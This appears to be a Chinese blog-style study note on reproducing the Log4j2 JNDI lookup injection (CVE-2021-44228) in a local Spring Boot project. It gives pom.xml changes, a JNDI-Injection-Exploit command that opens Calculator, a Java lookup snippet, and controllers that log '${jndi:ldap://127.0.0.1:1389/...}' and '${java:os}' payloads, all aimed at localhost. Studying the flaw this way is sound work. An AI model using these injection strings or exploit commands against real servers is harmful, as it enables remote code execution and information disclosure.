【log4j2】lookup注入漏洞

学习了一下最近曝出的log4j2漏洞（CVE-2021-44228），随便写个笔记，不求甚解。

参考资料：
https://itsc.nju.edu.cn/7a/42/c41947a555586/page.htm
https://www.lunasec.io/docs/blog/log4j-zero-day/
https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_8748923582296814965%22%7D&n_type=1&p_from=4
https://baijiahao.baidu.com/s?id=1718946520876495065&wfr=spider&for=pc

环境：
参考：
https://www.cnblogs.com/keeya/p/10101547.html

由于既存项目采用spring-boot默认的logback，复现漏洞需要引入log4j2的依赖：
原pom.xml：

    
        org.springframework.boot
        spring-boot-starter-parent
        2.0.3.RELEASE
        
    

	
        org.springframework.boot
        spring-boot-starter-web
    

修改后的pom.xml：

        
            org.springframework.boot
            spring-boot-starter-web
            
                
                    org.springframework.boot
                    spring-boot-starter-logging
                
            
        
        
            org.springframework.boot
            spring-boot-starter-log4j2
        

先说结论：
既存项目采用spring-boot默认的logback，虽然maven依赖有以下两个jar包，但并不受此次漏洞影响，经测试，log里能够输出"${jndi:ldap://127.0.0.1:1389/1qjuex}"字符串。

log4j-to-slf4j-2.10.0.jar
log4j-api-2.10.0.jar

浅显地了解了几种复现的方法，本文记录的是学习过程中，尝试过的几个方法。
1.marshalsec 可能需要搭ldap环境，而且class文件需要自己编译，遂放弃；
2.借用工具 JNDI-Injection-Exploit，抛异常，未能成功调出计算器，应该是官方有修复；
3.没用jndi注入，而是采用"${java:os}"，成功。

实现过程：
1.marshalsec（未实现）
参考：
http://www.hackdig.com/12/hack-559266.htm

2.JNDI-Injection-Exploit（未实现）
执行下面第3步的时候后台报错，结果不完整，未能调出计算器。
参考：
https://www.cnblogs.com/Welk1n/p/11701401.html
https://github.com/welk1n/JNDI-Injection-Exploit

实现过程：
1)下载jar包
https://github.com/welk1n/JNDI-Injection-Exploit/releases
2)打开cmd，进入jar包所在目录，执行以下命令：

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open /Applications/Calculator.app" -A "127.0.0.1"

取得图中内容：

3)执行以下代码（后台报错）

    public static void main(String[] args) throws Exception {
        InitialContext ctx = new InitialContext();
        ctx.lookup("ldap://127.0.0.1:1389/1qjuex");
    }

4)在项目中添加以下处理，并通过浏览器向这个controller发请求

    @RequestMapping("/log4jtest")
    public String log4jtest() {

        Logger logger = LogManager.getLogger(LogManager.ROOT_LOGGER_NAME);
        logger.error("TEST: {}", "${jndi:ldap://127.0.0.1:1389/1qjuex}");
        return "index";
    }

同样抛异常，但看后台打印的log，没输出"${jndi:ldap://127.0.0.1:1389/1qjuex}"这个字符串，应该是识别了jndi的指令。

3.采用"${java:os}"
在项目中添加以下处理，并通过浏览器向这个controller发请求，log成功输出相关信息

    @RequestMapping("/log4jtest")
    public String log4jtest() {

        Logger logger = LogManager.getLogger(LogManager.ROOT_LOGGER_NAME);
        logger.error("TEST:{}", "${java:os}");
        return "index";
    }

参考：
https://blog.csdn.net/lumingzhu111/article/details/121871114